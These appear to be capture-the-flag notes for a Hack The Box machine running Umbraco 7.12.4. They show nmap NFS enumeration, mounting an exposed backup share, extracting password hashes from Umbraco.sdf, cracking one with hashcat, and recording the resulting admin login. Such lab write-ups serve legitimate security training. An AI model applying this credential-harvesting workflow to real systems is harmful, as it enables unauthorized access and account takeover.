4 :111 rpc

$ nmap --script=nfs-ls,nfs-statfs,nfs-showmount -p 111 10.10.10.180
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-13 14:31 PDT
Nmap scan report for 10.10.10.180
Host is up (0.17s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-ls: Volume /site_backups
|   access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION  UID         GID         SIZE   TIME                 FILENAME
| rwx------   4294967294  4294967294  4096   2020-02-23T18:35:48  .
| ??????????  ?           ?           ?      ?                    ..
| rwx------   4294967294  4294967294  64     2020-02-20T17:16:39  App_Browsers
| rwx------   4294967294  4294967294  4096   2020-02-20T17:17:19  App_Data
| rwx------   4294967294  4294967294  4096   2020-02-20T17:16:40  App_Plugins
| rwx------   4294967294  4294967294  8192   2020-02-20T17:16:42  Config
| rwx------   4294967294  4294967294  64     2020-02-20T17:16:40  aspnet_client
| rwx------   4294967294  4294967294  49152  2020-02-20T17:16:42  bin
| rwx------   4294967294  4294967294  64     2020-02-20T17:16:42  css
| rwx------   4294967294  4294967294  152    2018-11-01T17:06:44  default.aspx
|_
| nfs-showmount:
|_  /site_backups
| nfs-statfs:
|   Filesystem     1K-blocks   Used        Available   Use%  Maxfilesize  Maxlink
|_  /site_backups  31119356.0  12169036.0  18950320.0  40%   16.0T        1023

Nmap done: 1 IP address (1 host up) scanned in 2.04 seconds

$ mkdir /mnt/remote
$ sudo mount -t nfs 10.10.10.180:/site_backups /mnt/remote -o nolock

$ ls -la
total 123
drwx------ 2 nobody 4294967294  4096 Feb 23  2020 .
drwxr-xr-x 4 root   root        4096 Jun 13 14:44 ..
drwx------ 2 nobody 4294967294    64 Feb 20  2020 App_Browsers
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 App_Data
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 App_Plugins
drwx------ 2 nobody 4294967294    64 Feb 20  2020 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 20  2020 bin
drwx------ 2 nobody 4294967294  8192 Feb 20  2020 Config
drwx------ 2 nobody 4294967294    64 Feb 20  2020 css
-rwx------ 1 nobody 4294967294   152 Nov  1  2018 default.aspx
-rwx------ 1 nobody 4294967294    89 Nov  1  2018 Global.asax
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 Media
drwx------ 2 nobody 4294967294    64 Feb 20  2020 scripts
drwx------ 2 nobody 4294967294  8192 Feb 20  2020 Umbraco
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 Umbraco_Client
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 Views
-rwx------ 1 nobody 4294967294 28539 Feb 19  2020 Web.config

Using https://our.umbraco.com/forum/getting-started/installing-umbraco/15892-How-to-tell-which-version-of-Umbraco-an-installation-uses
$ cat Web.config| grep Status
                <add key="umbracoConfigurationStatus" value="7.12.4" />
				
Umbraco Version is 7.12.4
We have Authenticated RCE exploit on exploitDB.

Write not allowed (https://our.umbraco.com/packages/developer-tools/umbraco-admin-reset/)


<connectionStrings>
		<remove name="umbracoDbDSN" />
		<add name="umbracoDbDSN" connectionString="Data Source=|DataDirectory|\Umbraco.sdf;Flush Interval=1;" providerName="System.Data.SqlServerCe.4.0" />
		<!-- Important: If you're upgrading Umbraco, do not clear the connection string / provider name during your web.config merge. -->
	</connectionStrings>

We see file Umbraco.sdf in path /App_Data

$ strings Umbraco.sdf
dministratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32

$ cat hash
b8be16afba8c314ad33d812f22a04991b90e2aaa
$ hashcat -m 100 hash /usr/share/wordlists/rockyou.txt
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese

Successful login using
admin@htb.local:baconandcheese